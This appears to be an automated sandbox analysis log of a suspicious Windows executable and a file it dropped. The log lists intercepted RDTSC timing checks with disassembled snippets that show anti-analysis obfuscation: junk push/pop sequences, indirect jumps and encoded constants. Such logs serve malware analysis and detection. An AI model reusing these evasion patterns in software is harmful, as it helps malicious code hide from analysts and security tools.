Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0618 second address: 53E061C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0706 second address: 53E070A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E070A second address: 53E070E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E070E second address: 53E0714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0714 second address: 53E071A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E071A second address: 53E071E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E07FC second address: 53E0800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0800 second address: 53E0806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0806 second address: 53E0833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 798E7517h 0x00000008 push esi 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d lea ebx, dword ptr [edi+01h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov esi, edx 0x00000015 jmp 00007F0148B58157h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0833 second address: 53E084B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148C8B7B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E084B second address: 53E0862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, byte ptr [edi+01h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0148B5814Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0862 second address: 53E0867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0867 second address: 53E090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 9992h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc edi 0x0000000c pushad 0x0000000d jmp 00007F0148B5814Fh 0x00000012 pushfd 0x00000013 jmp 00007F0148B58158h 0x00000018 or ecx, 620C5CD8h 0x0000001e jmp 00007F0148B5814Bh 0x00000023 popfd 0x00000024 popad 0x00000025 test al, al 0x00000027 jmp 00007F0148B58156h 0x0000002c jne 00007F01B85602FEh 0x00000032 pushad 0x00000033 mov edi, eax 0x00000035 push eax 0x00000036 jmp 00007F0148B58159h 0x0000003b pop ecx 0x0000003c popad 0x0000003d mov ecx, edx 0x0000003f jmp 00007F0148B58157h 0x00000044 shr ecx, 02h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E090E second address: 53E0929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0929 second address: 53E0983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov edi, 6E6C4096h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d rep movsd 0x0000000f rep movsd 0x00000011 rep movsd 0x00000013 rep movsd 0x00000015 rep movsd 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F0148B58153h 0x0000001e sbb ch, 0000001Eh 0x00000021 jmp 00007F0148B58159h 0x00000026 popfd 0x00000027 jmp 00007F0148B58150h 0x0000002c popad 0x0000002d mov ecx, edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0983 second address: 53E0989 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0A9D second address: 53E0AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, DFDAh 0x00000007 call 00007F0148B5814Bh 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ecx, dword ptr [ebp-10h] 0x00000013 pushad 0x00000014 movsx edx, ax 0x00000017 pushfd 0x00000018 jmp 00007F0148B5814Eh 0x0000001d or esi, 47F91D48h 0x00000023 jmp 00007F0148B5814Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr fs:[00000000h], ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F0148B58155h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0AFA second address: 53E0B21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b mov edi, esi 0x0000000d mov cx, F58Fh 0x00000011 popad 0x00000012 pop edi 0x00000013 pushad 0x00000014 mov bx, si 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0B21 second address: 53E0B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0B25 second address: 53E0B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0B29 second address: 53E0B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007F0148B58154h 0x0000000d pop ebx 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 popad 0x00000013 leave 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0148B58151h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0B61 second address: 53E0B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0B65 second address: 53E0B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0B6B second address: 53E0618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0008h 0x0000000c cmp dword ptr [ebp-2Ch], 10h 0x00000010 mov eax, dword ptr [ebp-40h] 0x00000013 jnc 00007F0148C8B7A5h 0x00000015 push eax 0x00000016 lea edx, dword ptr [ebp-00000590h] 0x0000001c push edx 0x0000001d call esi 0x0000001f push 00000008h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 6EF36C second address: 6EF383 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0148B5814Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8656AC second address: 8656B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86EB5A second address: 86EB6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0148B5814Ch 0x0000000c rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86EB6C second address: 86EB71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86ECF2 second address: 86ECF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86F006 second address: 86F00C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86F00C second address: 86F016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0148B58146h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86F016 second address: 86F020 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0148C8B7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86F159 second address: 86F15F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86F15F second address: 86F16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0148C8B7ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86F46D second address: 86F478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86F478 second address: 86F47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 86F47C second address: 86F482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 873048 second address: 87304E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 87304E second address: 873084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 3346D2A3h 0x00000011 and edi, 6ED488A7h 0x00000017 mov dword ptr [ebp+122D1D99h], ebx 0x0000001d lea ebx, dword ptr [ebp+12457E9Eh] 0x00000023 jnp 00007F0148B58148h 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c jbe 00007F0148B58148h 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 873084 second address: 8730A1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0148C8B7A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jl 00007F0148C8B7A6h 0x00000016 jne 00007F0148C8B7A6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 87314F second address: 873153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 873153 second address: 873157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 873157 second address: 873178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0148B58153h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 873178 second address: 873209 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jnl 00007F0148C8B7BFh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 jc 00007F0148C8B7ACh 0x0000001e js 00007F0148C8B7A6h 0x00000024 pop eax 0x00000025 pop eax 0x00000026 mov cx, AA61h 0x0000002a push 00000003h 0x0000002c mov dword ptr [ebp+122D2FB5h], edx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D36CCh], edi 0x0000003a mov di, B075h 0x0000003e push 00000003h 0x00000040 jmp 00007F0148C8B7B3h 0x00000045 mov ecx, ebx 0x00000047 push 9C1E344Dh 0x0000004c push ecx 0x0000004d push eax 0x0000004e pushad 0x0000004f popad 0x00000050 pop eax 0x00000051 pop ecx 0x00000052 xor dword ptr [esp], 5C1E344Dh 0x00000059 mov cl, 90h 0x0000005b lea ebx, dword ptr [ebp+12457EA7h] 0x00000061 mov si, cx 0x00000064 push eax 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push edx 0x00000069 pop edx 0x0000006a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 87327F second address: 8732E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 mov edi, 554F8B79h 0x0000000e call 00007F0148B58149h 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a pop edx 0x0000001b push eax 0x0000001c jmp 00007F0148B58153h 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 push edi 0x00000026 jmp 00007F0148B58154h 0x0000002b pop edi 0x0000002c mov eax, dword ptr [eax] 0x0000002e push eax 0x0000002f push edx 0x00000030 jc 00007F0148B58150h 0x00000036 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8732E0 second address: 8732F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8732F3 second address: 87337E instructions: 0x00000000 rdtsc 0x00000002 js 00007F0148B58146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c mov dword ptr [ebp+122D37E7h], edi 0x00000012 push 00000003h 0x00000014 jng 00007F0148B58148h 0x0000001a push 00000000h 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F0148B58148h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 pushad 0x00000039 jmp 00007F0148B5814Bh 0x0000003e mov ebx, dword ptr [ebp+122D2C10h] 0x00000044 popad 0x00000045 push 8A8587DDh 0x0000004a jmp 00007F0148B5814Ah 0x0000004f add dword ptr [esp], 357A7823h 0x00000056 add dh, 00000036h 0x00000059 lea ebx, dword ptr [ebp+12457EB2h] 0x0000005f sub ecx, dword ptr [ebp+122D2B2Ch] 0x00000065 xchg eax, ebx 0x00000066 jmp 00007F0148B58150h 0x0000006b push eax 0x0000006c push edi 0x0000006d push eax 0x0000006e push edx 0x0000006f push ebx 0x00000070 pop ebx 0x00000071 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 891811 second address: 891817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 891DA1 second address: 891DAB instructions: 0x00000000 rdtsc 0x00000002 je 00007F0148B58146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 891DAB second address: 891DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 891DB1 second address: 891DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 891DB7 second address: 891DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 891DBB second address: 891DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0148B58150h 0x0000000d jmp 00007F0148B58155h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 892085 second address: 89208C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8925B8 second address: 8925BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 892E77 second address: 892E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 892E7B second address: 892E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 892E7F second address: 892E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 893133 second address: 893148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B5814Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 893148 second address: 89314E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 89314E second address: 893170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F0148B58148h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F0148B58150h 0x00000017 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 893170 second address: 893175 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 893175 second address: 893182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F0148B58146h 0x0000000d rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8935DE second address: 8935F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007F0148C8B7A6h 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8935F0 second address: 8935FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 jo 00007F0148B5814Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 895F0C second address: 895F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 895F10 second address: 895F45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0148B58146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jns 00007F0148B58146h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jmp 00007F0148B5814Ah 0x0000001c jmp 00007F0148B5814Bh 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 pop edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 895F45 second address: 895F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 85828F second address: 8582C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0148B58158h 0x00000009 popad 0x0000000a jmp 00007F0148B58154h 0x0000000f rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8582C0 second address: 8582E3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0148C8B7A8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0148C8B7B7h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8582E3 second address: 858321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58159h 0x00000007 jl 00007F0148B58146h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jo 00007F0148B58164h 0x00000017 pushad 0x00000018 jp 00007F0148B58146h 0x0000001e jbe 00007F0148B58146h 0x00000024 popad 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 89E5DE second address: 89E5E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 89DA55 second address: 89DA60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F0148B58146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 89DD43 second address: 89DD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0148C8B7A6h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 89E1DB second address: 89E1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A10AC second address: 8A10B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A10B0 second address: 8A10B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A10B6 second address: 8A1102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0148C8B7A6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 5B25AF41h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F0148C8B7A8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f call 00007F0148C8B7A9h 0x00000034 jmp 00007F0148C8B7ABh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push edx 0x0000003f pop edx 0x00000040 rdtsc
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	RDTSC instruction interceptor: First address: 8A1102 second address: 8A110C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0148B58146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
